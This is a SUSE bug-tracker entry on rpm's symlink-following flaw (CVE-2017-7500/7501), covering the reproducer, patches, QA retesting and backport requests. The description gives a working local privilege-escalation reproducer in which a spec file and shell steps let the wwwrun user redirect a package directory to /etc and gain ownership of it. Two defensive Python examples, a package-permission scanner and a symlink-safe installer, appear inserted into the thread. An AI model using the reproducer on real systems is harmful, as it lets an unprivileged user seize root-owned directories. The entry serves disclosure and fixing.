Bug 943457 - (CVE-2017-7500) VUL-1: CVE-2017-7500 CVE-2017-7501: rpm: user owned subdirectories in rpm packages can lead user to root escalation
Status: CONFIRMED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: Other
Priority: P4 - Low
Severity: Normal
Target Milestone: ---
Assigned To: Michael Schröder
QA Contact: Security Team bot
Whiteboard: CVSSv2:SUSE:CVE-2017-7500:6.8:(AV:L/A...
Depends on:
Blocks:
Reported: 2015-08-27 12:44 UTC by Ludwig Nussel
Modified: 2022-02-09 09:47 UTC (History)


Attachments
CVE-2017-7500.patch (1.12 KB, patch), 2017-07-11 13:29 UTC, Marcus Meissner
CVE-2017-7501-1.patch (2.47 KB, patch), 2017-07-11 13:31 UTC, Marcus Meissner
CVE-2017-7501-2.patch (1.41 KB, patch), 2017-07-11 13:32 UTC, Marcus Meissner
CVE-2017-7501-3.patch (827 bytes, patch), 2017-07-11 13:32 UTC, Marcus Meissner

Description Ludwig Nussel 2015-08-27 12:44:38 UTC
rpm follows symlinks to directories when installing packages. I.e. if a package contains /usr/share/foo/bar and /usr/share/foo is a symlink to /etc, rpm would install bar into /etc. Moreover, rpm also applies all attributes to the directory the symlink is pointing at.

That becomes a problem if a package contains subdirectories in directories
owned by an unprivileged user. That unprivileged user can then replace the
subdirectory with a symlink to a root owned directory. On next package upgrade
rpm would follow the symlink, change the ownership of the linked directory and
install files there.

Consider the following example:

$ cd ~/rpmbuild/SPECS
$ cat perm.spec 
Name:           perm
Version:        1
Release:        0
Group:          Development/Tools/Building
Summary:        Lorem ipsum
License:        GPL-2.0+
BuildRoot:      %_tmppath/%name-%version-build
Url:            http://www.opensuse.org/
BuildArch:      noarch

%description
Lorem ipsum dolor sit amet, consectetur adipisici elit, sed
eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim
ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut
aliquid ex ea commodi consequat. Quis aute iure reprehenderit in
voluptate velit esse cillum dolore eu fugiat nulla pariatur.
Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui
officia deserunt mollit anim id est laborum.

%prep
%build

%install
install -d -m 755 %buildroot/usr/share/foo/bar
echo test > %buildroot/usr/share/foo/bar/baz

%files
# Everything below is owned by the unprivileged wwwrun user, so wwwrun can
# replace the packaged subdirectory bar with a symlink before the next upgrade.
%defattr(0755,wwwrun,root)
%dir /usr/share/foo
%dir /usr/share/foo/bar
/usr/share/foo/bar/baz

%changelog
$ rpmbuild -bb perm.spec
...
$ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm
$ l /usr/share/foo/
total 0
drwxr-xr-x 1 wwwrun root    6 27. Aug 14:34 ./
drwxr-xr-x 1 root   root 6132 27. Aug 14:34 ../
drwxr-xr-x 1 wwwrun root    6 27. Aug 14:34 bar/
$ sudo -u wwwrun rm -r /usr/share/foo/bar
$ sudo -u wwwrun ln -s /etc /usr/share/foo/bar
$ l /usr/share/foo/bar
lrwxrwxrwx 1 wwwrun www 4 27. Aug 14:35 /usr/share/foo/bar -> /etc/
$ l -d /etc/
drwxr-xr-x 1 root root 6010 27. Aug 14:21 /etc//
$ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm --force
$ l -d /etc/
drwxr-xr-x 1 wwwrun root 6016 27. Aug 14:35 /etc//
$ l /etc/baz
-rwxr-xr-x 1 wwwrun root 5 27. Aug 14:34 /etc/baz*
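As a packager-side check for the layout the description warns about, here is an added Python example; it is not part of the bug report or of rpm, and the function names are mine. It parses the per-file listing that `rpm -qp --qf '[%{FILEMODES:perms} %{FILEUSERNAME} %{FILEGROUPNAME} %{FILENAMES}\n]' pkg.rpm` prints and flags every packaged entry whose nearest packaged parent directory is owned by a non-root user or is group/world writable, because that user can swap the entry for a symlink before the next upgrade. The listing embedded below is constructed from perm.spec above plus two extra cases. The check only sees directories the package itself ships; a parent directory that comes from another package has to be checked on the installed system.

```python
import posixpath
from dataclasses import dataclass

# Constructed listing, in the format of
#   rpm -qp --qf '[%{FILEMODES:perms} %{FILEUSERNAME} %{FILEGROUPNAME} %{FILENAMES}\n]' perm-1-0.noarch.rpm
# The first three lines mirror perm.spec from the description; the rest are
# extra cases added for this example.
SAMPLE_LISTING = """\
drwxr-xr-x wwwrun root /usr/share/foo
drwxr-xr-x wwwrun root /usr/share/foo/bar
-rwxr-xr-x wwwrun root /usr/share/foo/bar/baz
drwxr-xr-x root root /usr/share/ok
-rw-r--r-- root root /usr/share/ok/file
drwxrwxrwt root root /var/tmp/app
-rw-r--r-- root root /var/tmp/app/x
"""


@dataclass
class Entry:
    perms: str   # ls-style mode string, e.g. "drwxr-xr-x"
    user: str
    group: str
    path: str

    @property
    def writable_by_others(self):
        # group-write is column 5, other-write is column 8 of the mode string
        return self.perms[5] == "w" or self.perms[8] == "w"


def parse_listing(text):
    entries = []
    for line in text.splitlines():
        if line.strip():
            perms, user, group, path = line.split(None, 3)
            entries.append(Entry(perms, user, group, path))
    return entries


def user_controlled_parents(entries, privileged_users=("root",)):
    """Return (path, reason) for every packaged entry whose nearest packaged
    parent directory can be modified by an unprivileged user."""
    by_path = {e.path: e for e in entries}
    findings = []
    for e in entries:
        parent = posixpath.dirname(e.path)
        while parent not in ("", "/") and parent not in by_path:
            parent = posixpath.dirname(parent)
        p = by_path.get(parent)
        if p is None:
            continue  # parent comes from another package: check it on the target system
        reasons = []
        if p.user not in privileged_users:
            reasons.append(f"parent {p.path} is owned by {p.user}")
        if p.writable_by_others:
            reasons.append(f"parent {p.path} is group/world writable ({p.perms})")
        if reasons:
            findings.append((e.path, "; ".join(reasons)))
    return findings


def scan(text):
    return user_controlled_parents(parse_listing(text))


if __name__ == "__main__":
    for path, reason in scan(SAMPLE_LISTING):
        print(f"{path}: {reason}")
```

On the sample it reports /usr/share/foo/bar and /usr/share/foo/bar/baz (parent owned by wwwrun) and /var/tmp/app/x (parent is world writable; the sticky bit does not stop the owner of a subdirectory from replacing it). /usr/share/foo itself is not reported because its parent is not in the package.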
Comment 17 Michael Schröder 2016-02-10 10:23:09 UTC
Nope.
Comment 20 Michael Schröder 2016-02-10 11:56:27 UTC
#18: if you read that comment in the Fedora bugzilla you'll notice that they asked me in irc about it.
Comment 21 Andreas Stieger 2016-02-10 12:20:00 UTC
Adding Florian Festi <ffesti@redhat.com> to cc

Paraphrases summary from SUSE internal discussion:

"This may be a problem known for a long time unfixable without breaking other valid use cases."

"A fix would be a hard change in behavior, needs to be acked by upstream. Many changes required to make it race-free; a user could modify directory contents while an rpm gets installed."

"Possibly previously discussed in the context of chkstat."
Comment 22 Ludwig Nussel 2017-05-04 14:42:27 UTC
So another year passed and we are still vulnerable with packagers adding more vulnerable packages.
Comment 26 Ludwig Nussel 2017-06-20 14:49:48 UTC
Found another new package submission to factory to fall into the trap. Can this be made public now?
Comment 27 Marcus Meissner 2017-07-04 07:38:28 UTC
(This issue is public now.)
Comment 28 Marcus Meissner 2017-07-11 13:26:31 UTC
also CVE-2017-7501
Comment 29 Marcus Meissner 2017-07-11 13:29:26 UTC
Created attachment 731961 [details]
CVE-2017-7500.patch

CVE-2017-7500.patch: for the directory traversal exploit part
Comment 30 Marcus Meissner 2017-07-11 13:30:16 UTC
https://bugzilla.redhat.com/show_bug.cgi?id=1452133 

 CVE-2017-7501 rpm: Following symlinks to files when installing packages allows privilege escalation

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7500

 CVE-2017-7500 rpm: Following symlinks to directories when installing packages allows privilege escalation
Comment 31 Marcus Meissner 2017-07-11 13:31:34 UTC
Created attachment 731962 [details]
CVE-2017-7501-1.patch

CVE-2017-7501-1.patch: 1/3 patches for file override
Comment 32 Marcus Meissner 2017-07-11 13:32:03 UTC
Created attachment 731963 [details]
CVE-2017-7501-2.patch

CVE-2017-7501-2.patch
Comment 33 Marcus Meissner 2017-07-11 13:32:23 UTC
Created attachment 731964 [details]
CVE-2017-7501-3.patch

CVE-2017-7501-3.patch
Comment 34 Konstantinos Tsamis 2018-05-17 14:07:59 UTC
Using the maintenance update SUSE:Maintenance:7433:165047, I am still getting the same results before and after for this bug. Please see the section for bug #943457 in the report here: http://qam.suse.de/testreports/SUSE:Maintenance:7433:165047/log

I get the exact same results as comment #0 before and after. For me, since this bug is VUL-1, this means that the update needs rejecting.
Comment 35 Michael Schröder 2018-05-17 14:56:20 UTC
That's because you're creating the symlink as user root. rpm treats this as indication that it is ok to follow the symlink.

Note also that I didn't use the attached patches, but instead went with what rpm upstream committed.

(BTW, just curious, who created that testcase?)
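Comment 35 states the rule rpm settled on: a symlink on the install path is followed only if root created it. The Python below is an added illustration of that rule and of the attribute half of the description; it is not rpm's code, and `install_file`, `UnsafePath`, `demo` and the `trusted_uids` parameter are my names (root is the default trusted uid; `demo()` passes the current uid so it runs unprivileged). Each path component is checked with lstat and opened with O_NOFOLLOW relative to the parent descriptor, packaged directory attributes are applied with fchmod on that descriptor instead of chmod on the path, and the file is written to a scratch name and renamed into place, so nothing resolves through a symlink an unprivileged user planted.

```python
import os
import stat


class UnsafePath(Exception):
    """The install path would resolve through something an untrusted user controls."""


def _open_dir(parent_fd, name, trusted_uids):
    """Open directory `name` relative to `parent_fd`. A symlink is followed only
    if its owner is in trusted_uids (rpm's rule: root-created links are
    intentional); any other symlink aborts instead of leading e.g. into /etc."""
    st = os.lstat(name, dir_fd=parent_fd)
    if stat.S_ISLNK(st.st_mode):
        if st.st_uid not in trusted_uids:
            raise UnsafePath(f"{name}: symlink owned by uid {st.st_uid}, refusing to follow")
        return os.open(name, os.O_RDONLY | os.O_DIRECTORY, dir_fd=parent_fd)
    if not stat.S_ISDIR(st.st_mode):
        raise UnsafePath(f"{name}: exists but is not a directory")
    # O_NOFOLLOW closes the race between the lstat above and this open: an
    # entry swapped for a symlink in between makes open() fail with ELOOP.
    try:
        return os.open(name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=parent_fd)
    except OSError as exc:
        raise UnsafePath(f"{name}: {exc.strerror}") from exc


def install_file(root, relpath, data, mode=0o644, dir_mode=0o755,
                 trusted_uids=frozenset({0})):
    """Write `data` to root/relpath, creating directories as needed, without
    ever resolving a path through an untrusted symlink. Returns the
    normalised relative path."""
    parts = [p for p in relpath.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise UnsafePath(f"refusing path {relpath!r}")
    dirs, fname = parts[:-1], parts[-1]
    fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for name in dirs:
            try:
                child = _open_dir(fd, name, trusted_uids)
            except FileNotFoundError:
                os.mkdir(name, dir_mode, dir_fd=fd)  # mkdir never follows its last component
                child = _open_dir(fd, name, trusted_uids)
            os.close(fd)
            fd = child
            # Packaged %dir attributes go onto the descriptor we hold, never onto
            # the path: chmod()/chown() on a path land on a symlink's target.
            os.fchmod(fd, dir_mode)
        tmp = fname + ".tmp-install"  # arbitrary scratch name chosen for this example
        tfd = os.open(tmp, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, mode, dir_fd=fd)
        try:
            os.write(tfd, data)
            os.fchmod(tfd, mode)
        except BaseException:
            os.close(tfd)
            os.unlink(tmp, dir_fd=fd)
            raise
        os.close(tfd)
        # rename(2) replaces the directory entry itself: a symlink planted under
        # `fname` is replaced, not written through (the CVE-2017-7501 case).
        os.rename(tmp, fname, src_dir_fd=fd, dst_dir_fd=fd)
    finally:
        os.close(fd)
    return "/".join(parts)


def demo():
    """Rebuild the reproducer layout from the description in a scratch directory
    and run three scenarios; returns what happened in each."""
    import tempfile
    root = tempfile.mkdtemp(prefix="rpm-symlink-demo-")
    os.makedirs(os.path.join(root, "usr/share/foo"))
    os.makedirs(os.path.join(root, "etc"))
    # wwwrun's move: replace the packaged subdirectory bar with a link to /etc
    # (relative, so the demo stays inside the scratch root)
    os.symlink("../../../etc", os.path.join(root, "usr/share/foo/bar"))
    out = {}
    try:
        install_file(root, "usr/share/foo/bar/baz", b"test\n", trusted_uids=frozenset())
        out["untrusted_symlink"] = "followed"
    except UnsafePath as exc:
        out["untrusted_symlink"] = f"refused: {exc}"
    out["etc_baz_after_refusal"] = os.path.exists(os.path.join(root, "etc/baz"))
    # same link, but its owner is trusted: this is what a root-created link is to rpm
    install_file(root, "usr/share/foo/bar/baz", b"test\n", trusted_uids=frozenset({os.getuid()}))
    out["etc_baz_after_trusted"] = os.path.exists(os.path.join(root, "etc/baz"))
    # honest layout: bar is a real directory again
    os.unlink(os.path.join(root, "usr/share/foo/bar"))
    install_file(root, "usr/share/foo/bar/baz", b"test\n", trusted_uids=frozenset())
    with open(os.path.join(root, "usr/share/foo/bar/baz"), "rb") as f:
        out["real_dir_content"] = f.read()
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The race that comment 21 worries about is narrowed rather than removed: the only window left is an attacker swapping the entry between the lstat and the open, and O_NOFOLLOW turns that into a failed open instead of a followed link. Note that the trusted case still lands the directory mode on the link target (here /etc), which is exactly the behaviour the rule accepts for root-created links.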
Comment 36 Konstantinos Tsamis 2018-05-18 11:55:15 UTC
(In reply to Michael Schröder from comment #35)
> That's because you're creating the symlink as user root. rpm treats this as
> indication that it is ok to follow the symlink.
> 
> Note also that I didn't use the attached patches, but instead went with what
> rpm upstream committed.
> 
> (BTW, just curious, who created that testcase?)

So I tried again with the symlink created by the user (instead of wwwrun I used testsuser) and the file is still created. The permissions are still changed. From what I see it makes no difference. Can you please take a look at the report again at the same section? Maybe I did again something wrong?

I guess Ludwig Nussel created the testcase? If you have another happy to try it as well but I think this is ok, it shows the issue :)
Comment 37 Konstantinos Tsamis 2018-05-22 13:28:22 UTC
Please let me know if there is something I'm doing wrong, I need some help on this because I'm blocked. Is the reproducer not correct for the patches that you used? Can you give me a "better" one? More suited to show the bug? Setting needinfo because the more this bug is not reproduced, the more the update will take to go out.
Comment 38 Michael Schröder 2018-05-24 15:01:32 UTC
Hmm. Seems like the upstream fix is incomplete or wrong. I'm afraid I need to discuss this with the rpm people. (I have some idea on how to fix it but I don't know if this will break anything else.)
Comment 42 Swamp Workflow Management 2018-07-26 19:15:24 UTC
SUSE-SU-2018:2073-1: An update that solves one vulnerability and has two fixes is now available.

Category: security (moderate)
Bug References: 1094735,1095148,943457
CVE References: CVE-2017-7500
Sources used:
SUSE Linux Enterprise Module for Development Tools 15 (src):    rpm-4.14.1-10.3.1
SUSE Linux Enterprise Module for Basesystem 15 (src):    python-rpm-4.14.1-10.3.1, rpm-4.14.1-10.3.1
Comment 43 Swamp Workflow Management 2018-08-06 13:17:41 UTC
openSUSE-SU-2018:2215-1: An update that solves one vulnerability and has two fixes is now available.

Category: security (moderate)
Bug References: 1094735,1095148,943457
CVE References: CVE-2017-7500
Sources used:
openSUSE Leap 15.0 (src):    python-rpm-4.14.1-lp150.9.3.1, rpm-4.14.1-lp150.9.3.1
Comment 44 Klaus Troeger 2018-09-12 14:36:05 UTC
Quick question:

When will this fix be backported to SLES12SP2/SP3 ?
Comment 45 Michael Schröder 2018-09-13 15:05:15 UTC
Any time you like to release it. The patch is already finished, I just need to commit it and submit the update.
Comment 46 Klaus Troeger 2018-09-14 05:16:24 UTC
Thanks Michael !
Pls. do so for SLES11 SP4 / SLES12 SP2 & SP3, as my customer is awaiting it 
(Bundesagentur für Arbeit is somehow a bit more aligned to CERT/Fixes 
due to their natural alignment)
Comment 47 Klaus Troeger 2018-09-19 14:39:43 UTC
@Michael: Any news here ... customer was just asking about an update !
Comment 48 Michael Schröder 2018-09-19 15:29:49 UTC
The update is submitted to maintenance (SR#172484). It now needs to go through QA, which might take some time.
Comment 50 Swamp Workflow Management 2018-10-22 16:12:47 UTC
SUSE-SU-2018:3286-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1077692,943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    rpm-4.11.2-16.16.1
SUSE Linux Enterprise Server 12-SP3 (src):    python3-rpm-4.11.2-16.16.1, rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE CaaS Platform ALL (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE CaaS Platform 3.0 (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
OpenStack Cloud Magnum Orchestration 7 (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
Comment 51 Swamp Workflow Management 2018-10-24 13:11:56 UTC
openSUSE-SU-2018:3373-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1077692,943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
openSUSE Leap 42.3 (src):    python3-rpm-4.11.2-14.10.1, rpm-4.11.2-14.10.1, rpm-python-4.11.2-14.10.1
Comment 52 Klaus Troeger 2018-11-05 13:55:27 UTC
@Michael: 

SLES12SP2 (LTSS) is still missing ... can we release this, too ?
Comment 53 Michael Schröder 2018-11-05 14:44:04 UTC
Dunno. Should we?
Comment 54 Michael Schröder 2018-11-05 14:47:16 UTC
(There's nothing to submit from my side for this.)
Comment 55 Swamp Workflow Management 2018-11-23 20:18:34 UTC
SUSE-SU-2018:3884-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE OpenStack Cloud 7 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    rpm-4.11.2-16.21.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    rpm-4.11.2-16.21.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP4 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP3 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-LTSS (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Enterprise Storage 4 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE CaaS Platform ALL (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE CaaS Platform 3.0 (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
OpenStack Cloud Magnum Orchestration 7 (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
Comment 56 Swamp Workflow Management 2019-04-27 22:34:14 UTC
SUSE-SU-2018:3884-2: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 57 José Guilherme Vanz 2019-07-02 17:57:29 UTC
We need this fix for SLES11 SP3 (LTSS). There is a L3 bug with a customer requesting this fix as well. Is it possible?

Thanks!
Comment 58 Michael Schröder 2019-07-03 11:24:47 UTC
Bah, that's rpm-4.4.2.3. That'll be a lot of work for a VUL-1 classified bug. Why do they request it?
Comment 59 José Guilherme Vanz 2019-07-05 17:58:20 UTC
(In reply to Michael Schröder from comment #58)
> Bah, that's rpm-4.4.2.3. That'll be a lot for work for a VUL-1 classified
> bug. Why do they request it?

The customer is requesting because they are using SLES11 SP3 LTSS. Thus, they want the security fix. ;-)

https://bugzilla.suse.com/show_bug.cgi?id=1135195
Comment 60 Michael Schröder 2019-07-08 09:16:05 UTC
That wasn't my point. My point was that this is a very minor security problem (thus the VUL-1, i.e. "fix with the next update").
Comment 61 José Guilherme Vanz 2019-07-08 13:09:13 UTC
(In reply to Michael Schröder from comment #60)
> That wasn't my point. My point was that this is a very minor security
> problem (thus the VUL-1, i.e. "fix with the next update").

Do we have a fix for SLES 11 SP3 in progress? I can see only for SLES 12 and SLES 15. I don't think the customer is willing to upgrade to SLES 12; they still have a good support period for SLES 11 SP3.
Comment 62 Michael Schröder 2019-07-08 14:26:45 UTC
Well, as L3 said they would do the backport I'm currently not working on it.
Comment 63 Radoslav Kolev 2022-02-09 08:20:57 UTC
Hello guys, 

I'm trying to make sure that CVE-2017-7501 is fixed in SLE 15SP2. It is marked as not affected in SMASH, also in the RH bugzilla and RPM changelog it is marked as fixed in version 4.14.0. But looking at the actual commit it narrowly didn't make it into rpm 4.14.0 https://github.com/rpm-software-management/rpm/commit/404ef011c300207cdb1e531670384564aae04bdc so it also didn't make it into our package in SP2, and there isn't a separate patch (like there is one for CVE-2017-7500).

It seems to me that maybe we are still affected. Am I missing something?
Comment 64 Michael Schröder 2022-02-09 09:24:14 UTC
(SLE-15-SP2 comes with 4.14.1)

I think it is included. There are just a couple of commits on top of it:

https://github.com/rpm-software-management/rpm/commit/2979d4ef5579e2bb3295ed0c97e322bebe5f0f46
https://github.com/rpm-software-management/rpm/commit/cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3
Comment 65 Radoslav Kolev 2022-02-09 09:47:58 UTC
(In reply to Michael Schröder from comment #64)
> (SLE-15-SP2 comes with 4.14.1)
> 
> I think it is included. There are just a couple of commits on top of it:
> 
> https://github.com/rpm-software-management/rpm/commit/2979d4ef5579e2bb3295ed0c97e322bebe5f0f46
> https://github.com/rpm-software-management/rpm/commit/cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3

Thanks, Michael! That clears all my doubts.